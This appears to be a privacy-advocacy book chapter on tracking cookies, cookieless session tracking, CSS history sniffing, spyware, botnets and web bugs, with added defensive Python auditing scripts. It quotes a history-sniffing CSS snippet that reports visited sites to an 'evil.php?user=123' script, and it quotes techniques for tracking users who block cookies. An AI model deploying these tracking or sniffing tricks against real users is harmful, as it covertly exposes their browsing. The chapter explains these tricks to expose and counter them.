All members of the Information Associates consortium will have access to this information. About the only person who won’t know a thing about this is you. You see, we bombarded you with notices about harmless cookies on the pages before you got here. If that worked as it has done with so many other people, you probably have turned off your cookie notices and so you probably won’t even get to see that we’re doing this, you poor chump. But just in case:
Set cookie?
Would you know how to find such a cookie on your computer? It takes a bit of patience. The very few cookies that are dangerous in themselves are buried in mounds and mounds of what would seem like harmless cookies. But then, as we have seen, even the seemingly innocuous cookies are dangerous when all the nearly meaningless snippets of information about you and other users of your family’s computer are assembled in one much larger database record.
One thing you will probably find at the beginning of your cookie file is the following:
Wow, a generated file! With a warning and an exclamation point! Look out kids, don’t touch that one! Perhaps in future versions they’ll take a cue from the video industry and include an FBI warning. After all, they don’t want you tampering with this file containing detailed information about the online habits of you and your family. That’s their business, not yours.
When I first began writing this, users generally didn’t know about cookies. By 2005 that had changed. The wide acceptance of programs like Ad-Aware has brought a great deal of attention to the phenomenon of cookies, especially what have come to be called “tracking cookies” or “persistent cookies.” These are the cookies that persist from session to session in order to track your website visits. “Session cookies,” which help keep track of things like shopping cart contents for the current session only, are generally perceived to be less dangerous.
People are beginning to be careful not to indiscriminately allow any kind of cookies to be planted on their machines. But the cookie clubs need not despair, as plenty of techniques have been developed to secure the “benefits” of tracking cookies even in the computers of users who delete them. However, published techniques generally replace session cookies rather than tracking cookies. They include the “query-string” approach, where an agile server generates a unique URL that actually contains an instantly generated session ID (sites that care about security will hash the session ID with the IP address of the user); using a feature of Microsoft’s IIS server to similarly disguise session information in the URL; creating a hidden form on every page of a site, with automatic hidden information filling the form each time a new link is clicked; and hiding session ID information in a JavaScript hidden frame.
Why do we find published only the alternative techniques for session cookies, while those for tracking cookies are not published? The answer is that the use of cookies to track users from session to session has achieved the status of due process: If you put the information in the cookie file then you have effectively disclosed what you are doing to the user; if you plant files somewhere else on their computer then, well, you’re pretty much doing what propagators of parasites and viruses and worms and other malware do.
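The distinction between session cookies and tracking cookies, and between cookies set by the site you meant to visit and cookies set by its cooperating partners, can be checked mechanically. The following is an added example in Python, not code from the book or from any of the companies it discusses. The host names and Set-Cookie headers are constructed for illustration; the same-site test is deliberately crude (a subdomain match) where production code would consult the Public Suffix List.

```python
from http.cookies import SimpleCookie

# Constructed sample (not from the book): Set-Cookie headers observed while
# loading one page on shop.example, each paired with the host that sent it.
PAGE_HOST = "shop.example"
OBSERVED = [
    ("shop.example", "cart=3; Path=/; Secure; HttpOnly"),
    ("shop.example", "prefs=lang%3Den; Max-Age=2592000; Path=/"),
    ("ads.tracker-net.example",
     "uid=7f3a9c; Domain=.tracker-net.example; Path=/; "
     "Expires=Wed, 09 Jun 2031 10:18:14 GMT; Secure"),
    ("cdn.shop.example", "sess=K9XQ; Path=/; HttpOnly"),
]


def same_site(host, page_host):
    """Crude same-site test: the host is the page host or one of its subdomains.
    Real tooling would compare registrable domains via the Public Suffix List."""
    return host == page_host or host.endswith("." + page_host)


def audit(observed, page_host):
    """Parse each Set-Cookie header and classify the cookie it carries.
    A cookie is persistent if it has Max-Age or Expires; without either it dies
    with the browser session, which is what the text calls a session cookie."""
    findings = []
    for set_by, header in observed:
        jar = SimpleCookie()
        jar.load(header)
        for name, morsel in jar.items():
            findings.append({
                "name": name,
                "set_by": set_by,
                "persistent": bool(morsel["max-age"] or morsel["expires"]),
                "third_party": not same_site(set_by, page_host),
                "http_only": bool(morsel["httponly"]),
                "secure": bool(morsel["secure"]),
            })
    return findings


def tracking_candidates(findings):
    """Names of cookies that are both persistent and set by a third party:
    the combination that lets a partner follow the same browser across sites."""
    return sorted(f["name"] for f in findings if f["persistent"] and f["third_party"])


if __name__ == "__main__":
    results = audit(OBSERVED, PAGE_HOST)
    for f in results:
        kind = "persistent" if f["persistent"] else "session"
        party = "third-party" if f["third_party"] else "first-party"
        print(f"{f['name']:<6} {kind:<10} {party:<12} set by {f['set_by']}")
    print("tracking candidates:", tracking_candidates(results))
```

In the sample only the advertiser's uid cookie is flagged: the shop's own prefs cookie is persistent but first-party, and the cart and sess cookies are plain session cookies.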
Charles Jennings and Lori Fena, The Hundredth Window: Protecting Your Privacy and Security in the Age of the Internet (New York: Free Press, 2000), xvii.
Justin Boyan, “Protecting User Privacy on the Web,” CMC Magazine, September 1997.
Let’s Say You Do Turn Cookies Off…
As “nontechnical” (whatever that means) people get more familiar with their information appliances, they tend to learn about things like cookies. Those who feel that the “session persistence” offered by cookies—the convenience of having personal information retained from session to session—doesn’t outweigh the damage to privacy can and do turn them off. So what’s the response of the cookie clubs? Respect the wishes of those who have made an explicit choice to value privacy above convenience? Display a message politely stating benefits and asking them to consider?
Of course not. What do you think this is—civilization or something?
Site operators deal with cookie blocking by looking for ways to subvert the intentions and decisions of those who stubbornly refuse to hand over personal information about themselves. If the user won’t give it, they look for ways to steal it. They are helped in that effort by the vendors of server and client software. The resulting methods are typically passed around in IRC (chat) sessions and at conferences, but occasionally they surface in publications, as in this Builder.com article:
You shouldn’t rely strictly on cookies for functionality. For example, what happens if your Web application is viewed through a wireless device that doesn’t support cookies or is viewed through a pre-HTML 2.0 or text-based browser? Another possibility is that your audience may be using cookie-blocking technology to protect their privacy.
Protect their privacy? Those meddlesome users have some nerve messing with our property—that is, our information about them!
To reach the widest audience possible…
…in other words, to bypass the explicit efforts of users to preserve their privacy…
…developers should take these scenarios into consideration when building any cookie-based Web application.
To deal with a situation where cookies aren’t available, you must build a custom session handler to transfer session information back and forth between the browser and Web server…
Query String Approach
Using the query string approach, the cookie value is stored in the URL and can be retrieved by both the server and the browser. Here is an example of a session identifier embedded in a Java Server Pages URL:
http://www.yoursite.com/index.jhtml;jsessionid=Y1EF3PRPX44QICWLEALCFFA
The author then goes on to explain how to use hash values incorporating the session ID to prevent people from capturing the session ID. “People” in this case means hackers—but of course could also mean that pesky, nosy user trying to figure out what you’re doing with information about her. Hackers, users, what’s the difference…
Here’s another way—actually two ways—to get around a user’s explicit decision not to be spied upon:
ASP.NET and Cookieless Sessions
For cookieless transactions in IIS4, you can use an ISAPI filter called Cookie Munger (ckymunge.dll) available in the Windows 2000 Server Resource Kit… ASP.NET has a built-in fallback mechanism to maintain cookieless sessions. IIS5 will do all the work of tracking the session information coming to and from the browser by automatically embedding the session identifier in all the relative links on your Web site. Here is an example of an ASP.NET URL implementing this feature:
http://www.myserver.com/(dvb4sd56h78f6t52vfd72v35)/Application/Webapp.aspx
But those annoying users can still come up with countermeasures…
The disadvantage of this approach is that if the user removes the session information in the URL, the session tracking will likely be lost. To deploy cookieless sessions in your ASP.NET application, all you need to do is reconfigure the cookieless variable in the config.Web file:
<configuration>
<system.web>
<sessionState cookieless="true" />
</system.web>
</configuration>
Or you can try “hidden forms.” Just as “persistent cookie” can be a misleading euphemism for “spy,” “hidden” in this case is a euphemism for “fake.”
Hidden Form Approach
The goal with the hidden form approach is to post a hidden value to the server every time a user navigates to a new page on your Web site. To make this work, every page on your site has to contain a form and an embedded hidden form field that looks something like this:
<input type="hidden" name="sessionid" value="F0DS2AAGGDJBB5FSFJ32DFV">
Then there’s the favorite tool of all sorts of snoopware authors, JavaScript (not to be confused—please!—with Java).
Parent Frame Approach
Our final approach uses JavaScript to retrieve a session ID stored in a hidden frame. The frameset code should be written like this:
<frameset rows="100%,*" frameborder="0" border="0" framespacing="0">
<frame name="main" src="contentpage.asp" frameborder="0" border="0">
<frame name="session" src="sessionid.asp" frameborder="0" border="0">
</frameset>
In the hidden sessionid.asp file, all we need to do is populate a JavaScript variable (sessionIdentifier) with the value of the session identifier (SessionID):
<script language="JavaScript">
sessionIdentifier = "<%=Session.SessionID%>";
</script>
In the visible frame, we can assign to sessionid the value of the sessionIdentifier variable located in the hidden frame:
<script language=“Javascript”>
var sessionid = parent.session.sessionIdentifier;
</script>
Still not enough tools for your espionage cabal? Here are a few that bypass the bypasses:
Alternative Solutions
The solutions we’ve looked at here cover conventional HTML-based technologies, but there are other ways of maintaining a session that extends beyond normal browser functionality. Here are a couple of these approaches.
XMLHTTP Approach
Using SOAP headers, it is possible to send and receive data, including session data. Edmond Woychowsky outlines some of the possibilities in his article “XMLHTTP ActiveX objects offer alternative to accessing ASP session variables.”
Java Approach
You can use Java applets to relay information back and forth between the server and the client without any browser intervention. Applets have no explicit support (or classes) for maintaining persistent states in the browser. However, applets can maintain a persistent state, create files, and read files on the server side. For the details, check the documentation for the Java2 Standard Edition Networking (java.net) package.
The article concludes with the inspiring admonition, in bold:
Persistence can pay off
We don’t need to play these games. The Personal Intellectual Property Infrastructure requires a site operator to display on a Web dialog a small, unobtrusive icon that signals what sort of personal information is being captured, and what provision in your Personal NDA makes that information capture legally permissible. You, as the author of your Personal NDA, can modify it at any time to change the rules for access to your personal information.
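The Builder.com article concedes that “if the user removes the session information in the URL, the session tracking will likely be lost.” That is the countermeasure the two URL-based approaches leave open, and it is easy to automate. Below is an added example in Python, not code from the book or from the article, that strips the two URL shapes the article itself shows: the Java-style `;jsessionid=` path parameter and the ASP.NET cookieless `(...)` path segment, plus session identifiers carried in the query string. The parameter names beyond `jsessionid` and `sessionid`, and the exact ASP.NET segment pattern, are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Names that carry a session identifier, either as a ";name=value" path
# parameter or as a query parameter. jsessionid and sessionid appear in the
# quoted article; the others are common names added here as an assumption.
SESSION_PARAMS = {"jsessionid", "sessionid", "phpsessid", "sid"}

# ASP.NET cookieless session segment: a whole path segment wrapped in
# parentheses, e.g. "(dvb4sd56h78f6t52vfd72v35)"; later ASP.NET versions
# wrap it as "(S(...))". The length bounds are an assumption for this example.
ASPNET_SEGMENT = re.compile(r"^\((?:S\()?[A-Za-z0-9]{20,32}\)?\)$")


def is_session_param(name):
    return name.lower() in SESSION_PARAMS


def strip_session_tokens(url):
    """Return the URL with server-planted session identifiers removed.
    Scheme, host, the remaining path and query, and the fragment are kept."""
    parts = urlsplit(url)          # urlsplit keeps ";params" inside the path

    segments = []
    for seg in parts.path.split("/"):
        if ASPNET_SEGMENT.match(seg):
            continue               # drop the cookieless ASP.NET segment outright
        base, *params = seg.split(";")
        kept = [p for p in params if not is_session_param(p.split("=", 1)[0])]
        segments.append(";".join([base] + kept))
    path = "/".join(segments)

    query = urlencode(
        [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
         if not is_session_param(k)]
    )
    return urlunsplit((parts.scheme, parts.netloc, path, query, parts.fragment))


if __name__ == "__main__":
    # The two URLs are the ones quoted in the article above; the third is constructed.
    for u in (
        "http://www.yoursite.com/index.jhtml;jsessionid=Y1EF3PRPX44QICWLEALCFFA",
        "http://www.myserver.com/(dvb4sd56h78f6t52vfd72v35)/Application/Webapp.aspx",
        "https://shop.example/search?q=boots&sid=abc123&page=2",
    ):
        print(u, "->", strip_session_tokens(u))
```

A browser extension or a filtering proxy can apply this to every outgoing request; the cost, as the article notes, is that the site forgets who you are between clicks, which for the user in question is the point.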
Visited Links, or You Too Can Rule the World
It is widely known that FBI Director J. Edgar Hoover retained power through many decades spanning eight presidential administrations simply by accumulating large amounts of nosy personal information about what everybody in Washington was up to. In pre-Web days it took the efforts of hundreds of agents to accumulate that database, which Hoover wielded like a club to get his way.
Are songwriters Curt Smith and Roland Orzabal right when they suggest that Everybody Wants to Rule the World? Does everybody want to be a J. Edgar Hoover?
Do you?
Well then, you’ll find the familiar visited-link Web site methodology to be of useful service to your megalomaniac desires. You know, the technique that changes the color of a link to show that you have already visited the site or page or document or picture to which it connects.
Visited-link information can be gathered by parties other than the owners of the sites and documents to which they point. The estimable SitePoint Tech Times newsletter from Melbourne describes the trick nicely:
The author of the site wishing to find out your browsing habits places a link on his page:
<div id="snoop">
<a id="examplelink"
href="http://www.example.com/">ex</a>
</div>
So that you don’t suspect anything, the CSS style sheet for the page hides the link:
#snoop {
display: none;
}
As you probably know, you can use CSS to assign a special style to a link that has already been visited. That style can include a background image for the link. To load that background image, the browser makes a request to the URL for the image.
Now, instead of giving the URL of a benign image file, the attacking site can supply a URL to a server-side script, passing along a unique ID to identify you:
#examplelink {
background-image: url(evil.php?user=123);
}
That script can then collect and store a list of all users who, in this case, have visited http://www.example.com/.
The attacking site can use information like this to display special content to visitors who visit particular sites, or, if you happen to log in and provide your personal details (say, to place an online order), they can discover exactly who’s visiting their competitors’ sites.
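The pattern the SitePoint piece describes has a recognisable shape in a stylesheet: a rule whose selector targets visited links and whose declarations fetch a URL, usually one carrying a per-user identifier. Here is an added example in Python, not from the book or from SitePoint, that scans CSS for that shape. The stylesheet it runs over is constructed for illustration; it includes the `#examplelink` rule from above with the `:visited` pseudo-class the description refers to, alongside rules that are harmless. Browsers have since limited what a `:visited` rule may change (colours only, no background images or other fetches), so a hit today is a legacy sniffing attempt or a style that no longer does what its author expected, either of which is worth a look.

```python
import re

# Constructed stylesheet (not from the book): one history-sniffing rule of the
# kind described above, mixed with ordinary visited-link styling.
SAMPLE_CSS = """
a:visited { color: purple; }
#snoop { display: none; }
#examplelink:visited { background-image: url(evil.php?user=123); }
.nav a:visited { background: url("/img/check.png") no-repeat; }
"""

# One CSS rule: selector text followed by a brace-delimited declaration block.
# Nested blocks (media queries) are not handled; this is a triage scanner.
RULE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.DOTALL)
# url(...) with optional quotes around the resource.
URL_FUNC = re.compile(r"url\(\s*['\"]?([^'\")]+)['\"]?\s*\)", re.IGNORECASE)


def find_visited_url_rules(css):
    """Return (selector, url) for every rule that styles :visited links AND
    loads a resource. Fetching anything conditionally on history is the leak."""
    hits = []
    for selector, body in RULE.findall(css):
        selector = " ".join(selector.split())        # normalise whitespace
        if ":visited" not in selector.lower():
            continue
        for url in URL_FUNC.findall(body):
            hits.append((selector, url))
    return hits


def likely_sniffing(hits):
    """Narrow the hits to URLs carrying a query string: a per-user parameter
    such as ?user=123 is what turns a conditional fetch into a report."""
    return [(sel, url) for sel, url in hits if "?" in url]


if __name__ == "__main__":
    found = find_visited_url_rules(SAMPLE_CSS)
    print("visited rules that fetch:", found)
    print("likely sniffing:", likely_sniffing(found))
```

Run over the sample it reports two rules that fetch under `:visited` and singles out the one whose URL carries an identifier; the plain `a:visited { color: purple; }` rule, the kind every site uses, is not reported.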
This has been a known bug in all browsers for years, and has been treated as a “moderate” vulnerability. That may be because developers of browser software tend to be happy with the craft of developing software and tend not to want to rule the world. They tend to see this as a privacy problem, a vulnerability that lets one or a few people snoop on acquaintances and colleagues.
They tend not to ask the question, “What if someone were to compile lists of visited links of every staff member supporting every person who appears to have political or governmental or managerial responsibility anywhere in the world? What if we were to then have an hourly report of deltas, for example, how and where has the attention of the staffs of the most influential people in the world changed in the last hour? What are they looking at?” Might they then be able to answer questions like, “Which merger candidate will win?” “How is Senator Jones likely to vote on this issue?” And finally, “How can we use this knowledge to influence the actual outcomes of these questions as well as other events, perhaps with the help of some Captology?”
So, Mr. Hoover-Wannabe, run out and get yourself a few terabytes of disk space (about $500 a terabyte), a nice 64-bit computer (motherboard with Athlon64, about $300) and a 64-bit database management system (free). It’ll all fit under your desk. Then start developing some scripts to harvest visited-link data from all over, and Buddy, you’ll be ruling the world in no time.
What’s that? Oh, very sorry sir. I mean Highness. No, Highness, I did not mean to call you Buddy.
Parasites
At least cookies regularly come under scrutiny. The fact that a lot of people know what’s going on in the world of cookies has made the abusers of cookie tools perhaps a little more discreet in the data gathering part of their intrusive activity, if not the data sharing part.
The propagators of parasites, on the other hand, have only recently begun to receive such scrutiny.
What is a parasite? It’s something that would be considered a virus if its propagators, having an economic motive, had not taken steps to make their viruses legal and thus not considered viruses by the vendors of virus protection software.
A parasite is a piece of code that gets embedded in your computer and reports back whatever information its propagator wants reported. What sites you have visited to shop for books, software, cars, gifts; political sites, blogs and lifestyle sites; all email addresses in your address book, along with names—all can easily be reported back to the propagator of a parasite. Why bother with cookie files, which, after all, everyone knows about and can easily detect on their computer? If your intentions are bad, why bother with the veneer of good intentions by messing with cookies? Just plant a parasite.
E-cards are a natural vehicle for parasites. People have learned to be wary of opening attachments that are the least bit suspicious, whereas e-cards evoke an emotional response that tends to displace caution. A mass mailing from cupid@valentines-ecard.com just before Valentine’s Day 2003 led many to open what turned out to be a commercial parasite that changed browser defaults and inserted at least one mysterious DLL into the user’s system. Soon someone will come up with a refined method of harvesting family and personal contacts from address books, making parasite e-cards quite indistinguishable from genuine ones.
The Doxdesk blog (www.doxdesk.com) provides a nice overview of the rapidly growing phenomenon, also known as spyware:
‘Parasite’ is a shorthand term for “unsolicited commercial software”—that is, a program that gets installed on your computer which you never asked for, and which does something you probably don’t want it to, for someone else’s profit. The parasite problem has grown enormously recently, and many millions of computers are affected. Unsolicited commercial software can typically:
- plague you with unwanted advertising (‘adware’);
- watch everything you do on-line and send information back to marketing companies (‘spyware’);
- add advertising links to web pages, for which the author does not get paid, and redirect the payments from affiliate-fee schemes to the makers of the software (such software is sometimes called ‘scumware’);
- set browser home page and search settings to point to the makers’ sites (generally loaded with advertising), and prevent you from changing it back (‘homepage hijackers’);
- make your modem (analogue or ISDN) call premium-rate phone numbers (‘dialers’);
- leave security holes allowing the makers of the software—or, in particularly bad cases, anyone at all—to download and run software on your machine;
- degrade system performance and cause errors thanks to being badly written;
- provide no uninstall feature, and put its code in unexpected and hidden places to make it difficult to remove.
You think that’s insidious? Try this. Some companies, anticipating that people will catch on and will search for parasite detection software, have already released such software. But it turns out that the software is a ruse—it actually plants parasites instead of removing them! Two of them identified by Doxdesk are:
TrekBlue offers a spyware remover called Spyware Nuker, which is being heavily advertised through junk e-mail from its ‘affiliates’. TrekBlue are the same company as e-mail marketers ‘TrekData’ and ‘Blue Haven Media’, who distribute spyware through ActiveX drive-by-download on web pages. They used to work for Lions Pride Enterprises, who made and control the ‘wnad’ spyware.
RedV offers an adware remover called AdProtector. However, the installer used to download this and the other RedV ‘Protector’ applications is itself adware, and RedV are the same company as Web3000, one of the early major spyware makers.
P2P and Open-Ended Tunnels
When we get to the prescriptive part of this book, the Instigations, we’ll spend a lot of time discussing online spaces where members of groups can work together securely. All forms of online collaboration are growing tremendously in popularity. At the tuned-in consumer end of the collaborative spectrum we have the music-file-sharing networks such as KaZaA, while at the buttoned-down corporate end we have virtual private networks, or VPNs. VPNs provide “secure” tunnels, as impermeable to parasites and the like as are the walls of the Lincoln Tunnel that connects Manhattan with New Jersey. Your company’s precious information assets are well protected inside a VPN tunnel.
Not.
Tunnels allow employees to work with confidential company files remotely, as for instance from the computer in the employee’s den at home. Of course when mom isn’t using the computer to update her department’s budget, her kids are using it to steal, er, share music with other users of peer-to-peer networks like KaZaA.
My objective is to generate enthusiasm for online collaboration, and so my observations about this particular form of online collaboration, the wide-open file-swapping peer-to-peer worldwide rave gathering, have a particular urgency. Some of these things simply open your computer to the world. You are simply publishing everything to an audience that consists of everyone.
The spyware parasites themselves are bad enough. But what happens when you use that file-swapping P2P network on the computer that sits at the end point of the company tunnel, the super-secure VPN? Why, everything at the other end of that tunnel, that is, the company server, is published for the world as well! Companies assess risk partly according to the hacking skill level necessary to penetrate, but with this arrangement, why, no skill is required at all! The competition can just come in and help themselves to those departmental budgets.
Are You a Spammer’s Accomplice?
Parasites are planted in your computer for other purposes besides spying. A parasite can also turn your computer into a spam host. Who is sending those volumes of annoying pitches for Viagra and Low Low Mortgage Rates? It could be you!
In the first half of 2003, many in the security and ISP community began to suspect that personal computers were being hijacked and turned into generators of unwanted email. Then in June, MessageLabs, the provider of email management services to corporations around the world, found the proof. According to Britain’s VNUnet,
Spammers are increasingly hijacking home PCs to send junk mail, according to MessageLabs.
The managed email service provider claims to have proof of spammers using viruses to plant Trojan malware on PCs to provide remote access.
Once the software is installed the PC can be used to send out spam at no cost or risk to the spammer.
“We’d speculated for some time that this may be happening, but it’s always been difficult to prove,” said Paul Woods, chief information analyst at MessageLabs.
“This activity is hard to spot because spammers only send a few spam mails from each PC to avoid internet service providers realising what is going on.
“The number of unshielded PCs using ‘always on’ broadband connections has grown, and they are easy pickings for the spammers.”
Scant months after that discovery, the public Internet had deteriorated to the point where the phenomenon of home computers turned into zombie hosts was obvious not just to security researchers focused on the subject, but to everyone. By early 2004 a succession of worms began to appear that were not directly very threatening to those infected but that revealed some significant network-building intentions on the part of their authors.
On March 15, 2004, the Phatbot worm appeared, first reported by managed security services provider LURHQ. According to their bulletin,
A kind of Darwinism pervades the world of trojan botnet development. With time, the more effective bots become increasingly popular, leading to additional development from secondary developers who provide “mods” to the bots. One very successful bot known as “Agobot” has now found itself superseded by “Phatbot”. Phatbot is actually a direct descendant of Agobot, with additional code rolled in from other sources. These additions have made Phatbot a more versatile and dangerous threat in the realm of Internet security. The analysis that follows attempts to detail the functionality of Phatbot for purposes of detection and elimination.
Phatbot has quite an extensive command list, much of which is derived from Agobot… What sets Phatbot apart from its predecessors is the use of P2P to control the botnet instead of IRC. Although Agobot has a rudimentary P2P system, IRC is still the main control vector. The author(s) of Phatbot chose to abandon Agobot’s IRC and P2P implementations altogether and replaced them with code from WASTE… [which] uses an encrypted P2P protocol designed for private messaging and file transfer between a small number of trusted parties…Since there is no central server in the WASTE network, the infected hosts also have to find each other somehow. This is accomplished by utilizing Gnutella cache servers—anyone can use the CGI scripts provided by these servers to register themselves as a Gnutella client. The Phatbot WASTE code registers itself with a list of URLs pretending to be a version of GNUT, a Gnutella client. Other Phatbot hosts then retrieve the list of Gnutella clients from these cache hosts using the same CGI scripts. The Phatbots differentiate themselves from the Gnutella clients by using TCP port 4387 instead of the standard Gnutella port.
WASTE was invented by Justin Frankel, who had earlier created the WinAMP music player. In 1999 AOL was attracted to the latter as a means to get their client software onto the music-download bandwagon, and so they purchased Frankel’s company Nullsoft, personally netting Frankel a reported one hundred million dollars. As part of the deal Frankel agreed to stay with AOL until a new version of WinAMP was finished.
Shortly after, AOL shocked the media world by purchasing Time Warner. Having spent time at the intersection of online services and magazine publishing, I know that if AOL’s Steve Case had turned red and sprouted horns and a barbed tail as the ink dried at the closing of that deal, many at Time Warner would have calmly turned to their colleagues muttering “told you so…”
Imagine then the amusement at Warner Music when their new fellow employee Justin Frankel subsequently released the P2P file sharing program Gnutella, powerfully improving upon the Napster idea. When AOLTW brass heard about Gnutella they immediately shut it down—or so they thought. Gnutella is completely P2P, with no central administration. Stephen Hawking and Marvin Minsky would probably consider it to be a form of life. When AOLTW eventually managed to slow the spread of the Gnut client and disrupt the operation of Gnutella, Justin Frankel further entertained his bosses by releasing WASTE, a P2P system where everything is transferred in encrypted form over AOL Instant Messenger and AOL ICQ. Justin Frankel finally left AOL in December 2003, after the company summarily pulled the plug on WASTE.
Some bosses just don’t appreciate hard work and creativity.
Spyware planted by piggybacking on existing P2P networks seemed like typical cookie club hijinks when it was first discovered and described. It looked like just another sleazy online marketing-espionage scheme, and it probably was. There’s no reason to believe that there is any organizational connection between those who first introduced these kinds of P2P tools and those who turned them into spam and spyware facilitators. More importantly, there is nothing that the inventor of these tools can do about their use. Picture a group of inventors and scientists manufacturing and distributing plutonium as a research material before its use in weapons was discovered. Now that the plutonium is out there, it’s not possible to bring it back. Gnutella and WASTE have very productive uses—and other uses. They’re apparently being taken to “the next level.”
That next level, which we have named Arpanet II, is a network on top of the Internet, VPN-style, a “network of (bot) networks” (that was the original definition of “an internet”) that appears to be attempting what the first Arpanet accomplished, that is, a network that will survive an attack by an enemy, one that will keep its effectiveness as nodes are taken out.
The enemy in this case is the provider of anti-virus tools, security services vendors, and their customers, e.g., you and me. Arpanet II is an attempt to gain control of the world’s information infrastructure.
What Is Arpanet II All About?
What’s the goal of the unknown sponsors of Arpanet II? Certainly they have more in mind than a platform for anonymously sending spam and pornography. That’s already been accomplished. Perhaps it’s the destruction of the world’s commercial, banking, and government infrastructures. Perhaps it’s complete control over information and communication channels into households. I guess we’ll find out soon enough.
As is the case with other infestations, eternal vigilance over spyware is not a sound, long term solution to the problem. As long as the space where we hang out is the “outdoor” Internet, where authentication is a hollow joke tossed around by copywriters to lull users into confidence, the propagators will always be one step ahead of even their most vigilant victims.
If constant vigilance is not your cup of tea, if your notion of fruitful use of the Internet is something other than spending all your time scanning for such garbage, monitoring intrusion detection systems, and tuning your firewall rules, then there is no hope at all for productive use of Internet time. Life on the public outdoor transport facility known as the Internet will always require constant vigilance.
That’s why you should consider moving to an indoor space. Stay tuned.
Web Bugs
We’re not done with insidiousness. Web bugs are another way for anyone—say some ex-convict working from a small office in a third-world city—to improve the local economic scene by selling information about you to companies that provide hard currency. This story is about an attempt to regulate (ha!) this particular practice of pilfering information about you a few bits at a time:
The Network Advertising Initiative, which comprises some of the internet’s leading advertising and ad technology companies, yesterday said it has finalized a set of best practices for the use of web bugs.
Web bugs, aka web beacons, are single-pixel GIF image tags in HTML documents used to track web users. The invisible bugs allow the page owner to measure user activity based on image server logs.
The NAI rules, which represent the industry’s attempt to self-regulate, ask companies using these techniques to provide a notice of web bug use that says what the bugs are used for and what data is transferred to third parties.
If the bug can be tied to personal data, such as via a cookie or an email address, and it will be disclosed to third parties, then there needs to be an opt-out for the user, but only when the disclosure is for purposes “unrelated” to the reason the data was collected.
Companies involved in the development of Web bug guidelines include IBM, Microsoft, the U.S. Postal Service, DoubleClick, WebSideStory, Advertising.com, 24/7 RealMedia, Coremetrics, KeyLime Software, and Guardent (as of February 2004 a unit of VeriSign).
Fortunately, Web bugs have been effectively blocked in many popular client programs.
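One way a client or proxy can spot the beacons described above, as an added example that is not code from the book or from the NAI: scan the page’s `<img>` tags for the classic tells, a one-pixel or CSS-hidden image, then note whether the request goes to a third-party host and carries a query string. The page host `shop.example` and the HTML snippet are constructed for the demonstration.

```python
"""Scan an HTML document for web bugs (tracking pixels).

Added example; not code from the book or from the NAI. The page host
and the HTML snippet below are constructed for the demonstration.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _ImgCollector(HTMLParser):
    """Collect the attributes of every <img> tag in the document."""

    def __init__(self):
        super().__init__()
        self.images = []

    def handle_starttag(self, tag, attrs):
        # html.parser already lower-cases tag and attribute names.
        if tag == "img":
            self.images.append({name: (value or "") for name, value in attrs})


def _pixels(value):
    """Parse a width/height attribute ("1", "1px"); None when not a plain number."""
    digits = value.strip().lower()
    if digits.endswith("px"):
        digits = digits[:-2]
    return int(digits) if digits.isdigit() else None


def find_web_bugs(html, page_host):
    """Return the <img> tags that look like beacons, with the reasons for each."""
    collector = _ImgCollector()
    collector.feed(html)
    page_host = page_host.lower()
    bugs = []
    for img in collector.images:
        src = img.get("src", "")
        parts = urlsplit(src)
        host = (parts.hostname or page_host).lower()  # relative src: same host as the page
        reasons = []

        width, height = _pixels(img.get("width", "")), _pixels(img.get("height", ""))
        if width is not None and height is not None and width <= 1 and height <= 1:
            reasons.append("1x1 image")
        style = img.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by CSS")
        if not reasons:
            continue  # a visible image of normal size is not a beacon

        # Context that raises severity: who receives the request, and what it carries.
        if host != page_host and not host.endswith("." + page_host):
            reasons.append("third-party host")
        if parts.query:
            reasons.append("query string (possible per-user identifier)")
        bugs.append({"src": src, "host": host, "reasons": reasons})
    return bugs


# Constructed sample page: one logo, one beacon with an id, one CSS-hidden beacon,
# and a normal banner served from the site's own CDN subdomain.
SAMPLE_HTML = """<html><body>
<img src="/images/logo.gif" width="120" height="40" alt="logo">
<img src="http://ads.tracker.example/beacon.gif?uid=4711" width="1" height="1" alt="">
<IMG SRC="http://stats.example.net/pixel.gif" STYLE="display: none">
<img src="http://cdn.shop.example/banner.gif" width="468" height="60">
</body></html>"""

if __name__ == "__main__":
    for bug in find_web_bugs(SAMPLE_HTML, "shop.example"):
        print(bug["host"], "->", ", ".join(bug["reasons"]))
```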
Harvesting Your Information Residue
Cookies and parasites aren’t the only source of information about you and where you’ve been and what you do on the Internet. Anonymizer.com notes that
Your IP address uniquely identifies your computer and is normally stored by every Web site you visit. This information can be bought and sold between Web sites and linked to your real world information to create a comprehensive profile of your personal data, including everywhere you surf.
The same site also notes that
In addition to cookies, websites are also allowed to store information in your browser cache. This means even if you delete your cookies, websites can get information back out of your cache. Now that you have seen what we can do with cookies, enter something to remember into the form below and click save. Then delete all your cookies. Then click “Retrieve Info”. We will be able to get the value back! You could even close your browser and restart and we will still get the value back! Until you clear your cache, we will have access to the info!
As long as you hang out outdoors, your life is visible to the whole world. Your equivalent in the physical world is the unfortunate family living in cardboard boxes under a bridge in the middle of the city or in the infamous Rocinha hillside favela in Rio.
Is that where you want to be? Doesn’t your family deserve better?
Barbarians at the Gate
Consider for a moment the possibilities of parasite software tools in the hands of unscrupulous mass marketers, thieves, power-hungry megalomaniacs, and other ambitious low life. When you think about what could be done to wreak utter havoc on society, you realize that havoc is as inevitable as was the inevitability of civil disorder in Iraq after the power structure was removed.
Will things get worse? Of course they will! Wherever and whenever society’s ability to enforce laws and keep order breaks down, the worst elements in society come out and claim control of the streets. We are surely headed for another Dark Ages if we keep dealing with these criminals and other dregs as though they were subject to the laws of some geographic jurisdiction, say, the U.S. They are taking over our personal computers. They are having a field day. And they’ve barely begun their exploits. Every misguided idea about controlling them using traditional methods not only leads to failure, it encourages them as they see that they are headed for victory, that is, control of all of our information and communication facilities, which of course implies control over our financial and governance facilities.
Parasites steadily become more effective, especially while our attention is distracted by the spam problem. The Sobig vandals of the first quarter of 2003 turned your computer into a spam host, relaying messages in such a way as to make their origin untraceable. You may have received one of the spam messages from the kidnapped personal computer of some unsuspecting neighbor in the global village, asking whether your computer has been running slow lately and suggesting you click and install their wonderful FREE software to, um, clear out the bad stuff and speed up the computer. What the software does, of course, is install the very parasitic software that slows the computer down as it gets busy with its new spamming chores. P.T. Barnum would have loved it!
